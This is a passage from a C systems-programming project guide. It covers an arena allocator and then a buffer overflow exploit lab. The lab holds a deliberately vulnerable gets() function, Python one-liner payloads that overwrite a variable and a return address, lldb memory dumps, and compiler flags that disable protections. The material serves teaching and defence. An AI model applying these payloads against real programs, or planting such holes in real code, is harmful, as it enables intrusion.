arena_destroydo? (Free the underlying memory) - Why is reset useful? (Reuse the same arena for the next batch)
- What does
- When to Use Arenas
- Game frames: allocate during frame, reset at frame end
- Request handling: allocate during request, reset when done
- Parsing: allocate AST nodes, free everything when parse is complete
- What do these patterns have in common?
- Growing Arenas (Advanced)
- What if you run out of space?
- Option 1: Return NULL (fail)
- Option 2: Allocate a new block, chain them together
- What’s the tradeoff?
Thinking Exercise: Design the Data Structure
Before coding, design your arena on paper:
Arena (1024 bytes total)
[ base ]----+
[ offset = 0 ] |
[ capacity = 1024 ] |
v
+----------------------------------------------------+
| empty space (1024 bytes) |
+----------------------------------------------------+
^
current position (base + offset)
After arena_alloc(arena, 100):
[ base ]----+
[ offset = 100 ] |
[ capacity = 1024 ] |
v
+----------------------------------------------------+
| USED: 100 bytes | empty space (924 bytes) |
+----------------------------------------------------+
^
current position (base + 100)
After arena_alloc(arena, 200):
[ offset = 300 ]
+----------------------------------------------------+
| USED: 100 | USED: 200 | empty (724 bytes) |
+----------------------------------------------------+
^
current position

Questions:
- What if the next allocation requests 800 bytes?
- How would you align the second allocation to 8 bytes?
- What happens to that 724 bytes after
arena_reset()?
The Interview Questions They’ll Ask
Prepare to answer these:
- “What is an arena allocator? When would you use one?”
- “What’s the time complexity of arena allocation vs malloc?”
- “Why can’t you free individual allocations from an arena?”
- “What is memory alignment and why does it matter?”
- “Compare arena allocators to pool allocators to general-purpose allocators.”
- “In what scenarios would an arena allocator be faster than malloc?”
Hints in Layers (Only If Stuck)
Hint 1: The Minimal Arena Struct
```c typedef struct { char* base; // Start of memory block size_t offset; // Current position (bytes used) size_t capacity; // Total size of block } Arena; ``` That's it! Three fields.Hint 2: Basic arena_alloc
```c void* arena_alloc(Arena* arena, size_t size) { if (arena->offset + size > arena->capacity) { return NULL; // Out of space } void* ptr = arena->base + arena->offset; arena->offset += size; return ptr; } ``` This is the "bump." It's O(1)!Hint 3: Alignment
To align to N bytes, round up the offset: ```c size_t align_up(size_t offset, size_t alignment) { return (offset + alignment - 1) & ~(alignment - 1); } void* arena_alloc_aligned(Arena* arena, size_t size, size_t alignment) { size_t aligned_offset = align_up(arena->offset, alignment); if (aligned_offset + size > arena->capacity) { return NULL; } void* ptr = arena->base + aligned_offset; arena->offset = aligned_offset + size; return ptr; } ```Hint 4: Use mmap for the Block
```c Arena* arena_create(size_t size) { Arena* arena = malloc(sizeof(Arena)); arena->base = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); arena->offset = 0; arena->capacity = size; return arena; } void arena_destroy(Arena* arena) { munmap(arena->base, arena->capacity); free(arena); } ``` `mmap` gives you a large, zero-initialized block directly from the OS.Books That Will Help
| Topic | Book | Chapter |
|---|---|---|
| Arena design patterns | “C Interfaces and Implementations” | Ch. 5-6 |
| Memory allocator internals | “Computer Systems: A Programmer’s Perspective” | Ch. 9.9 |
| mmap and virtual memory | “The Linux Programming Interface” | Ch. 49 |
| Alignment requirements | “Computer Systems: A Programmer’s Perspective” | Ch. 3.9.3 |
| Allocator strategies | “Operating Systems: Three Easy Pieces” | Ch. 17 |
Project 5: Exploit Lab (Buffer Overflow Playground)
- File: SPRINT_1_REAL_WORLD_PROJECTS.md
- Programming Language: C
- Coolness Level: Level 4: Hardcore Tech Flex
- Business Potential: 3. The “Service & Support” Model
- Difficulty: Level 3: Advanced
- Knowledge Area: Security / Systems Internals
- Software or Tool: GDB / Buffer Overflows
- Main Book: “Hacking: The Art of Exploitation” by Jon Erickson
What you’ll build: A set of intentionally vulnerable programs and exploits that demonstrate buffer overflow, return address overwriting, and memory corruption—in a controlled environment.
Why it teaches memory & control: Nothing makes memory real like watching your input overwrite a return address and redirect execution. This is where “undefined behavior” stops being a compiler warning and becomes observable reality.
Core challenges you’ll face:
- Overflowing a buffer to overwrite adjacent variables (maps to: buffer overflow)
- Overwriting a function’s return address on the stack (maps to: stack layout)
- Understanding why ASLR/stack canaries exist (maps to: why C doesn’t protect you)
- Using lldb to observe the corruption in real-time (maps to: debuggers see memory)
- Crafting input that survives null-byte restrictions (maps to: string representation)
Key Concepts: | Concept | Resource | |———|———-| | Stack smashing | “Hacking: The Art of Exploitation” Ch. 3 - Jon Erickson | | Return-oriented programming basics | LiveOverflow YouTube - “Binary Exploitation” series | | Using sanitizers | LLVM AddressSanitizer documentation |
Difficulty: Intermediate-Advanced Time estimate: 1-2 weeks Prerequisites: Solid understanding of stack frames, comfort with lldb
Real World Outcome
When you complete this project, you’ll have concrete proof that buffer overflows aren’t just theoretical. Here’s what success looks like:
1. Basic Variable Overwrite (Level 1)
Running the exploit:
$ ./level1_vuln $(python3 -c "print('A'*64 + '\x78\x56\x34\x12')")
You win!
What happened: The buffer overflow overwrote the adjacent check variable with the magic value 0x12345678.
Before the overflow (in lldb):
(lldb) frame variable
(char [64]) buffer = ""
(int) check = 0
After the overflow (in lldb):
(lldb) frame variable
(char [64]) buffer = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
(int) check = 305419896 (0x12345678) // ← Overwritten!
2. Return Address Overwrite (Level 2)
Exploiting the program:
$ ./level2_vuln $(python3 -c "import sys; sys.stdout.buffer.write(b'A'*72 + b'\x56\x11\x40\x00\x00\x00\x00\x00')")
You shouldn't be able to call this function!
Segmentation fault: 11
Visual: Stack Corruption Step-by-Step
Before strcpy:
High addresses
┌────────────────────────────┐
│ Return Address │ ← 0x00007fff5fbff8a0 (legitimate)
├────────────────────────────┤
│ Saved Frame Pointer │ ← 0x00007fff5fbff8b0
├────────────────────────────┤
│ buffer[64] │ ← Empty
│ (64 bytes) │
└────────────────────────────┘
Low addresses
After strcpy with 72 ‘A’s + address:
High addresses
┌────────────────────────────┐
│ Return Address │ ← 0x0000000000401156 (win function!)
├────────────────────────────┤
│ Saved Frame Pointer │ ← 0x4141414141414141 ('AAAAAAAA')
├────────────────────────────┤
│ buffer[64] │ ← 'AAAA...AAAA' (64 A's)
│ (64 bytes) │
└────────────────────────────┘
Low addresses
3. Full lldb Session Showing Exploitation
Setting up the debugger:
$ lldb ./level2_vuln
(lldb) breakpoint set --name vulnerable
Breakpoint 1: where = level2_vuln`vulnerable, address = 0x0000000100003f20
(lldb) run $(python3 -c "import sys; sys.stdout.buffer.write(b'A'*72 + b'\x56\x11\x40\x00\x00\x00\x00\x00')")
Before the vulnerability:
Process 12345 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
frame #0: 0x0000000100003f20 level2_vuln`vulnerable
level2_vuln`vulnerable:
-> 0x100003f20 <+0>: push rbp
0x100003f21 <+1>: mov rbp, rsp
0x100003f24 <+4>: sub rsp, 0x50
(lldb) register read rbp rsp rip
rbp = 0x00007fff5fbff8b0
rsp = 0x00007fff5fbff8b8
rip = 0x0000000100003f20 level2_vuln`vulnerable
After strcpy executes:
(lldb) breakpoint set --name vulnerable --one-shot true
(lldb) continue
(lldb) memory read --size 8 --format x --count 12 $rbp-64
0x7fff5fbff870: 0x4141414141414141 ← buffer starts here
0x7fff5fbff878: 0x4141414141414141
0x7fff5fbff880: 0x4141414141414141
0x7fff5fbff888: 0x4141414141414141
0x7fff5fbff890: 0x4141414141414141
0x7fff5fbff898: 0x4141414141414141
0x7fff5fbff8a0: 0x4141414141414141
0x7fff5fbff8a8: 0x4141414141414141
0x7fff5fbff8b0: 0x4141414141414141 ← saved rbp (corrupted!)
0x7fff5fbff8b8: 0x0000000000401156 ← return address (OVERWRITTEN to win!)
Register dump showing corruption:
(lldb) register read
General Purpose Registers:
rax = 0x00007fff5fbff870
rbx = 0x0000000000000000
rcx = 0x00007fff5fbff870
rdx = 0x00007fff5fbff9c0
rdi = 0x00007fff5fbff870 ← points to our 'AAAA...' string
rsi = 0x00007fff5fbff9c0
rbp = 0x4141414141414141 ← CORRUPTED! Was a valid address
rsp = 0x00007fff5fbff8b0
rip = 0x0000000100003f45 ← still in vulnerable(), about to return
When the function returns:
(lldb) nexti
(lldb) register read rip
rip = 0x0000000000401156 ← Now executing win()!
Process 12345 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over
frame #0: 0x0000000000401156 level2_vuln`win
level2_vuln`win:
-> 0x401156 <+0>: push rbp
0x401157 <+1>: mov rbp, rsp
0x40115a <+4>: lea rdi, [rip + 0xe9b]
0x401161 <+11>: call puts
Terminal output:
You shouldn't be able to call this function!
You've successfully exploited the buffer overflow!
4. Detection with AddressSanitizer
When you compile the same program with -fsanitize=address, here’s what you see:
$ clang -fsanitize=address -g level2_vuln.c -o level2_vuln_asan
$ ./level2_vuln_asan $(python3 -c "print('A'*72 + 'BBBBBBBB')")
=================================================================
==23456==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffee3bff8b0 at pc 0x000104a3c890 bp 0x7ffee3bff850 sp 0x7ffee3bff010
WRITE of size 80 at 0x7ffee3bff870 thread T0
#0 0x104a3c88f in __asan_memcpy
#1 0x104a02156 in vulnerable level2_vuln.c:12
#2 0x104a02089 in main level2_vuln.c:23
#3 0x7fff6c3a9cc8 in start
Address 0x7ffee3bff8b0 is located in stack of thread T0 at offset 112 in frame
#0 0x104a020cf in vulnerable level2_vuln.c:10
This frame has 1 object(s):
[32, 96) 'buffer' (line 11) ← 64-byte buffer
HINT: this may be a false positive if your program uses some custom stack unwind mechanism
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow in __asan_memcpy
Shadow bytes around the buggy address:
=>0x1fffdc77fef0: 00 00 00 00 00 00[f1]f1 f1 f1 00 00 00 00 00 00
0x1fffdc77ff00: 00 00 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00
==23456==ABORTING
What this shows: AddressSanitizer caught the overflow immediately, showing:
- Exactly where the write occurred (
vulnerable level2_vuln.c:12) - How much was written (80 bytes into a 64-byte buffer)
- The stack frame layout and what got corrupted
5. Deliverables
By the end of this project, you’ll have:
- A set of increasingly difficult vulnerable programs:
level1.c- Variable overwritelevel2.c- Return address overwritelevel3.c- Calling a “win” functionlevel4.c- (Advanced) Basic shellcode injection
- Exploit scripts for each level:
- Shows exact byte offsets
- Demonstrates little-endian encoding
- Includes comments explaining each step
- A detailed write-up (markdown) containing:
- Stack diagrams for each vulnerability
- lldb commands used to verify exploitation
- Before/after register and memory dumps
- Explanation of what would happen with ASLR/canaries enabled
- Discussion of modern mitigations (DEP, ASLR, stack canaries)
- Visual proof:
- Screenshots or terminal recordings of successful exploits
- lldb session logs showing return address modification
- AddressSanitizer output catching the vulnerabilities
Why This Matters
After completing this project, the phrase “buffer overflow” transforms from an abstract concept to a visceral understanding. You’ve seen:
- Memory corruption happening in real-time
- How a simple string copy can hijack program control flow
- Why security mitigations like ASLR exist
- That “undefined behavior” has very defined consequences
This knowledge is the foundation for understanding:
- Why modern languages emphasize memory safety
- How attackers think about software vulnerabilities
- What security researchers mean by “exploitable”
- Why code review and secure coding practices matter
Learning milestones:
- First milestone: You can overflow a buffer to change an adjacent variable’s value
- Second milestone: You can overwrite a return address to redirect execution
- Final milestone: You viscerally understand why memory safety matters
The Core Question You’re Answering
“Why do buffer overflows let attackers take over computers?”
This question has defined computer security for 50 years. By building and exploiting vulnerable programs yourself, you’ll understand exactly how memory corruption becomes code execution—and why this is such a serious problem.
Concepts You Must Understand First
Stop and research these before coding:
- Stack Frame Layout (Critical!)
- What’s in a stack frame? (Local variables, saved frame pointer, return address)
- In what order are these laid out?
- Which direction does the stack grow? Which direction do arrays grow?
- Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 3.7 - Bryant & O’Hallaron
- The Return Address
- What is the return address and where is it stored?
- What happens at the
callinstruction? Atret? - What if you change the return address to point somewhere else?
- Book Reference: “Hacking: The Art of Exploitation” Ch. 3 - Jon Erickson
- Buffer Overflow Mechanics
- What happens when you write past the end of a buffer?
- Why does C allow this? (No bounds checking)
- What values can you overwrite?
- Modern Mitigations
- ASLR: Randomizes addresses on each run—why does this help?
- Stack Canaries: Magic values that detect overwrites—how do they work?
- NX/DEP: Non-executable stack—why is this effective?
- How do you disable these for learning? (
-fno-stack-protector,-z execstack,-no-pie)
Questions to Guide Your Design
Before implementing, think through these:
- Level 1: Variable Overwrite
- Create a program with a buffer and an adjacent “secret” variable
- How do you overflow the buffer to change the secret?
- What’s the exact offset you need to write to?
- Level 2: Control Flow Hijack
- Create a program with a vulnerable function
- Where is the return address relative to the buffer?
- How do you calculate the exact bytes to overwrite?
- What address do you redirect execution to?
- Level 3: Calling a “Win” Function
- Create a program with a function that’s never called (
void win() { ... }) - How do you find the address of
win()? - Craft input that makes the program call
win()when it shouldn’t
- Create a program with a function that’s never called (
- Level 4: Shellcode (Advanced)
- What is shellcode?
- Why do you need the stack to be executable?
- How do you jump to your own code?
- What’s a NOP sled and why is it useful?
Thinking Exercise: Map the Stack
Draw the stack for this function:
void vulnerable() {
char buffer[64];
int authenticated = 0;
printf("Enter password: ");
gets(buffer); // VULNERABLE!
if (authenticated) {
printf("Access granted!\n");
} else {
printf("Access denied.\n");
}
}
Draw the stack frame:
High addresses
+------------------------+
| return address | <-- target for level 2
+------------------------+
| saved frame pointer |
+------------------------+
| authenticated (4) | <-- target for level 1
+------------------------+
| |
| buffer[64] |
| |
+------------------------+
Low addresses

Questions:
- If
bufferstarts at offset 0, where isauthenticated? - What input would change
authenticatedto non-zero? - Where is the return address relative to
buffer? - What input would overwrite the return address?
The Interview Questions They’ll Ask
Prepare to answer these:
- “What is a buffer overflow? How does it lead to code execution?”
- “Walk me through how a stack-based buffer overflow works.”
- “What is ASLR? How does it protect against exploits?”
- “What are stack canaries? How do they work?”
- “What’s the difference between a stack overflow and a buffer overflow?”
- “Why is
gets()so dangerous? What should you use instead?”